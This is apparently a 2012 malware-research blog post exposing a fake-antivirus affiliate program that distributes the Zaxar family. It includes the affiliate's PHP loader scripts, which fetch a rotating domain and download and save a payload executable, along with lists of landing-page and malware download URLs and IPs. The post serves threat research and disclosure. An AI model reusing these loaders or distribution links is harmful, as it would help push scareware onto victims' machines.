Friday 9 March 2012

FakeAV Affiliate who distribute Zaxar Family

Advert found in Blackhole

First contact the 24 Feb

Then recontact the 25, 6 and more seriously about business the 7 Mar:


9 Mar, loader operational.

"Marketing compagny" no name... no logo... look's like a private affiliate.
• dns: » ip: 188.72.248.141 - adresse: NET-WINTOOLS.BIZ

Login:

News:


Statistics:

Promo:

Statistics by promo:

Payement:

Profile:

FAQ:

load1.txt:
<?php

/*
 * Получает ехе и записывает в файл
 *
 */


$fileName="scanner.1";
$afid="you_afid"; // 1
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$actual_domain=file_get_contents($urlActualDomain);

if (!$actual_domain) my_error("Can't get domain.");
$exe_url="http://$actual_domain/ldpatch/softpatch.php?afid=".$afid;

$baka_exe=file_get_contents($exe_url);

if (strlen($baka_exe)> 0){
    $h = fopen($fileName,"w");
    fwrite($h,$baka_exe);
    fclose($h);    
    echo "OK";
}else{
    my_error("Can't get exe.");
}      
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
     echo ("Update baka - Error:".$error_str."\r\n");
     exit;
}

?>

load2.txt:
<?php

/*
 * Load2
 * записает актуальный домен в файл
 *
 */


$fileDomain="domain.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$actual_domain =file($urlActualDomain);

if (sizeof($actual_domain)== 0 ) my_error("Can't get domain.");

$h = fopen($fileDomain,"w");
$text=implode("", $actual_domain);
fwrite($h,"http://".$text);
fclose($h);

echo "OK";
exit;

////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
     echo ("Update baka - Error:".$error_str."\r\n");
     exit;
}
////////////////////////////////////////////////////////////////////////////////
?>

load3.txt
<?php
/*
 *  Load3
 *  дописает к урл ( например /scanner15/?afid=3)
 */


$fileName="my_file.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$h = fopen($fileName,"w");
$text = file($urlActualDomain);
$text=implode("", $text);

fwrite($h,"http://".$text."/scanner15/?afid=3");
fclose($h);
echo "OK";
exit;
?>

This Affiliate spread actually Antivirus Protection (if you want the sample)


Landing pages:
• dns: 1 » ip: 31.184.234.89 - adresse: SPACEIN-WEB1.UNI.ME
http://spacein-web1.uni.me/monitor10/?www=465
http://spacein-web1.uni.me/monitor11/?www=465
http://spacein-web1.uni.me/monitor15/?www=465

• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK
http://video-nklpc1.tk/xxx2/?www=465
http://video-nklpc1.tk/xxx5/?www=465

• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK
http://uber-scanpcxz3.tk/monitor10/?www=465
http://uber-scanpcxz3.tk/monitor11/?www=465
http://uber-scanpcxz3.tk/monitor15/?www=465






Malware dowload:
• dns: 1 » ip: 83.149.112.46 - adresse: GOADVANCED-SOFTZ.IN
http://goadvanced-softz.in/sis/spch.php?www=465
http://goadvanced-softz.in/sis/in/out/465.exe

• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN
http://white-doggysoft.in/sis/spch.php?www=465
http://white-doggysoft.in/sis/in/out/465.exe
http://white-doggysoft.in/soft/loader.exe
http://white-doggysoft.in/soft/installer_m.exe

Also a weird string was found in the promo server: Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs
Maybe it's the same program or maybe he payed the  people of BakaSoft and they selled the system.

Index Of/

2 comments:

  1. LOL at the 20mb file WTF how is that even possible.

    ReplyDelete
    Replies
    1. it tries to look like a real av...

      Delete